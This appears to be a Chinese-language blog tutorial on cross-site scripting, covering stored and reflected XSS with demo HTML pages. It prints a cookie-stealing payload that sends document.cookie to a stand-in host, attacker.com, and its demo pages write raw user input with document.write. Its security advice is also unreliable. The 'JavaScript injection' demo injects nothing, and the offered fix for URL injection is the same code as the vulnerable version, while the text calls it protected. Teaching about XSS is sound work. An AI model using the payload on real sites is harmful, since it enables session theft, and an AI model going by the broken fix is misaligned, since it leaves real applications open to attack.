作者：EARPHONE

https://juejin.cn/post/7231831557941723194

XSS攻擊

一. 概述

XSS攻擊是一種常見的Web安全漏洞，它可以讓攻擊者在受害者的瀏覽器中執行惡意腳本，從而竊取用戶的敏感信息或者進行其他惡意行為。本文主要介紹XSS的原理和實現方式，并且通過實例來說明如何防范XSS攻擊。

二. XSS攻擊的基本原理

XSS攻擊是指攻擊者通過執行惡意腳本來攻擊Web應用程序，從而在受害者的瀏覽器中執行惡意代碼。XSS攻擊可以分為兩種類型：存儲型XSS和反射型XSS。

1. 存儲型XSS

存儲型XSS是指攻擊者將惡意腳本存儲在Web應用程序的數據庫中，當用戶訪問包含惡意腳本的頁面時，惡意腳本會被執行。存儲型XSS攻擊通常發生在留言板，評論區等需要用戶輸入內容的地方。

2. 反射型XSS

反射型XSS是指攻擊者將惡意腳本作為參數發送給Web應用程序，Web應用程序將惡意腳本反射給用戶的瀏覽器，從而執行惡意代碼。反射型XSS攻擊通常發生在搜索框，登錄框等需要用戶輸入內容的地方。

三. XSS攻擊的實現方式

XSS攻擊可以通過多種方式來實現，包括以下幾種：

1. HTML注入

攻擊者可以在Web應用程序中注入HTML標簽和屬性，從而執行惡意代碼。例如，攻擊者可以在留言板中輸入以下內容：

<script>alert('XSS攻擊')</script>

當用戶訪問包含這個留言的頁面時，就會彈出一個提示框內，從而執行惡意代碼。

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>XSS攻擊</title>
</head>

<body>
    <h1>Welcome to my website!</h1>
    <p>Enter your name:</p>
    <input type="text" id="name">
    <button onclick="greet()">Greet</button>
    <script>
        //在input輸入框中輸入<script>alert('XSS攻擊')</script>
        function greet() {
            let name = document.getElementById("name").value;
            document.write("<p>Hello, " + name + "!</p>");
        }
    </script>
</body>

</html>

運行截圖：

?

2. JavaScript注入

攻擊者可以在Web應用程序中注入JavaScript代碼，從而執行惡意代碼。例如：攻擊者可以在搜索框中輸入以下內容：

<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

當用戶在輸入框中輸入關鍵字時，就會將用戶的Cookie發送給攻擊者的服務器，從而竊取用戶的敏感信息。

注：attacker.com/steal.php^[1]。它的名稱和URL表明它可能是一個用于竊取用戶信息的網站，例如用戶名、密碼、信用卡信息等。攻擊者可能會使用各種技術和手段來欺騙用戶，使其在該網站上輸入敏感信息，從而實現竊取。因此，用戶應該保持警惕，避免在不信任的網站上輸入敏感信息，同時使用安全的密碼和身份驗證方法來保護自己的賬戶。網站管理員也應該采取措施來保護用戶數據，例如使用SSL加密、限制訪問、監控異常活動等。

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>JavaScript注入</title>
</head>

<body>
    <h1>Welcome to my website!</h1>
    <p>Enter your name:</p>
    <input type="text" id="name">
    <button onclick="greet()">Greet</button>
    <script>
        function greet() {
            let name = document.getElementById("name").value;
            document.write("<p>Hello, " + name + "!</p>");
            let script = document.createElement("script");
            script.innerHTML = "alert('JavaScript注入xss攻擊!')";
            document.body.appendChild(script);
        }
    </script>
</body>

</html>

運行截圖：

3. URL注入

攻擊者可以在url中注入惡意代碼，從而執行惡意代碼。例如：攻擊者可以構造如下url：

http://example.com/search.php?q=<script>alert('XSS攻擊')</script>

當用戶訪問這個url時，就會執行惡意代碼，從而進行攻擊。

注：example.com/^[2]，它不屬于任何實際的組織或公司，也沒有任何實際的內容。它的目的是為了提供一個可用的域名，供開發人員和測試人員使用，以測試網站和應用程序的功能和性能。該網站通常用于演示和測試目的，不包含任何敏感信息或個人數據。

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>URL注入XSS攻擊</title>
</head>

<body>
    <h1>Welcome to my website!</h1>
    <p>Enter your name:</p>
    <input type="text" id="name">
    <button onclick="greet()">Greet</button>
    <script src="script.js"></script>
</body>

</html>

function greet() {
    let name = document.getElementById("name").value;
    document.write("<p>Hello, " + name + "!</p>");
    let url = "http://example.com/search?q=" + encodeURIComponent("<script>alert('XSS攻擊')</script>");
    window.location.href = url;
}

 為了防止URL注入XSS攻擊，應該對URL參數進行過濾和轉義，以確保它們不包含任何惡意腳本。在這個例子中，使用了encodeURIComponent()函數來對查詢參數進行編碼，以確保它們不包含任何特殊字符。同時，應該避免在URL中包含未經過濾的用戶輸入。

//對上述script.js進行修改
function greet() {
    let name = document.getElementById("name").value;
    document.write("<p>Hello, " + name + "!</p>");
    //使用了encodeURLComponent()函數來對查詢參數進行編碼
    let url = "http://example.com/search?q=" + encodeURIComponent("<script>alert('XSS攻擊')</script>");
    window.location.href = url;
}

四. 總結

XSS攻擊是一種常見的Web安全漏洞。它可以讓攻擊者在受害者的瀏覽器中執行惡意腳本，從而竊取用戶的敏感信息或者進行其他惡意行為。為了防止XSS攻擊，我們可以在服務器端對用戶輸入的內容進行過濾和轉義，從而防止惡意腳本的注入。在實際開發中，我們需要注意XSS攻擊的規范，以保障Web應用程序的安全性。